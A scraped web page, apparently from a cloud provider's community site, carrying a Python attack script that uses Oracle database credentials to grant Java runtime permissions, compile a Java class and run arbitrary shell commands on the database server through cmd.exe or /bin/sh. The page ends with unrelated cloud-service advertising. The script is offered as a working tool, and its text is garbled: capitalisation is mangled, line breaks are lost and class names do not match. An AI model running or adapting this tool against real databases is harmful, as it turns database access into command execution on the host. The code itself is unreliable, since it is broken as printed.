#!/usr/bin/Env python#-*-coding:utf-8-*-# file:ora_exec_cmd.py# Author:persuitimport getoptimport sysimport cx_oracledef usage (): Print ('Usage:python%s [options]'% sys.argv[0]) print ("') Print ('Options:') Print ('-H HOST,--host=host target server address') Print ('-u USER,--user=user Username') Print ('-P PASS,--pass=pass Password') Print ('-S SID,--sid=sid Target SID Name') Print ('-P Port,--port=port Oracle Port') #print ('-B BYPASS,--bypass=bypass BYPASS Creation of Evil Functions') Print ('-C command,--command=command command') def connectdb (host="', user ="', passwd ="', sid ="', Port =1521): Try: ConnStr='%s/%[email protected]%s:%d/%s'% (User,passwd,host,int(port), SID) Conn=Cx_oracle.connect (connstr) except Cx_oracle.databaseerror ase:print str (e) sys.exit (-1) returnConndef Main ():Try: opts, args= Getopt.getopt (sys.argv[1:],'H:u:p:s:p:c:', ['host=','user=','passwd=','sid=','port=','command=']) except getopt. Getopterror asE:print ('[-]%s'%(str (e))) usage () Sys.exit (2) Host="'User="'passwd="'Sid="'Port=1521Command="' forO, ainchopts:ifOinch('- H','--host'): Host=a elif oinch('- u','--user'): User=a elif oinch('- P','--passwd'): passwd=a elif oinch('- S','--sid'): Sid=a elif oinch('- P','--port'): Port=a elif oinch('- C','--command'): Command=aElse: PassifNot Host:print ('[!] Host not being empty!') usage () Sys.exit (2) Elif not User:print ('[!] username not be empty!') usage () Sys.exit (2) Elif not Passwd:print ('[!] Password not be empty!') usage () Sys.exit (2) Elif not Sid:print ('[!] SID not being empty!') usage () Sys.exit (2) Elif not Command:print ('[!] command not being empty!') usage () Sys.exit (2) #conn= Connectdb ('127.0.0.1','Oracle','123456','SDFSDF','dbtest',1521) Conn=Connectdb (host,user,passwd,sid,port) cursor=conn.cursor () print ("[-] Setting permissions...\n") SetPermission=" "BEGINDbms_java.grant_permission ('{0}','java.io.FilePermission','<<all files>>','read, write, execute, delete'); Dbms_java.grant_permission ('{0}','SYS:java.lang.RuntimePermission','Writefiledescriptor',"'); Dbms_java.grant_permission ('{0}','SYS:java.lang.RuntimePermission','Readfiledescriptor',"'); END;" ". Format (User.upper ())Cursor.execute (setpermission) #conn. Commit () print ("[-] Creating Java class...\n") Createjava=" "Create or replace and compile Java source named "Linxutil" as import java.io.*; public class Linxutil extends Object {public static string Run_cmd (String args) {try {string[] fcmd;if (system.getproperty ("Os.name"). toLowerCase (). IndexOf ("windows")! =-1) {fcmd = new string[3];fcmd[0] = "c:\\\\windows\\\\system32\\\\ Cmd.exe "; fcmd[1] ="/C "; fcmd[2] = command;} else {fcmd = new string[3];fcmd[0] = "/bin/sh"; fcmd[1] = "-C"; fcmd[2] = command;} Final Process PR = runtime.getruntime (). EXEC (Fcmd);p r.waitfor (); New Thread (New Runnable () {public void run () { BufferedReader br_in = null;try {br_in = new BufferedReader (New InputStreamReader (Pr.getinputstream ())); String buff = null;while ((buff = Br_in.readline ()) = null) {System.out.println (buff); try {thread.sleep);} catch (Exc Eption e) {}}br_in.close ();} catch (IOException IoE) {System.out.println ("Exception caught printing process output."); Ioe.printstacktrace ();} Finally {try {br_in.close ();} catch (Exception ex) {}}}}). Start (); New Thread (NewRunnable () {public void run () {BufferedReader Br_err = null;try {br_err = new BufferedReader (New InputStreamReader (pr.gete Rrorstream ())); String buff = null;while ((buff = Br_err.readline ()) = null) {System.out.println ("Error:" + buff); try {thread.sleep (100) ; } catch (Exception e) {}}br_err.close ();} catch (IOException IoE) {System.out.println ("Exception caught printing process error."); Ioe.printstacktrace ();} Finally {try {br_err.close ();} catch (Exception ex) {}}}}). Start (); catch (Exception ex) {System.out.println (Ex.getlocalizedmessage ());}}};" "cursor.execute (Createjava) print ("[-] Creating function...\n") Creatfunc=" "Create or Replace function Run_cmd (p_cmd in VARCHAR2) return number as language Java name'Util.runthis (java.lang.String)returnInteger';" "cursor.execute (creatfunc) print ("[-] Creating procedure...\n") Creatproc=" "Create or Replace procedure RC (P_cmd in VARCHAR2) as x number; begin x: = Run_cmd (p_cmd); end;" "cursor.execute (creatproc) print ("[-] Exec cmd ... \ n") cmd=" "DECLAREL_output Dbms_output.chararr; L_lines INTEGER:= +; Begin Dbms_output.enable (1000000); Dbms_java. Set_output (1000000); RC ('{0}'); Dbms_output.get_lines (L_output, l_lines); For I in1.. l_lines LOOP Dbms_output.put_line (L_output (i)); NULL; END LOOP; End;" ". Format (command)cursor.execute (cmd) print ("[-] Drop function...\n") Dropfunc=" "BEGINdrop function Run_cmd; END;" "Cursor.execute (Dropfunc) cursor.close () conn.close ()if__name__ = ='__main__': Main ()
Oracle Create stored procedure execution command script
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
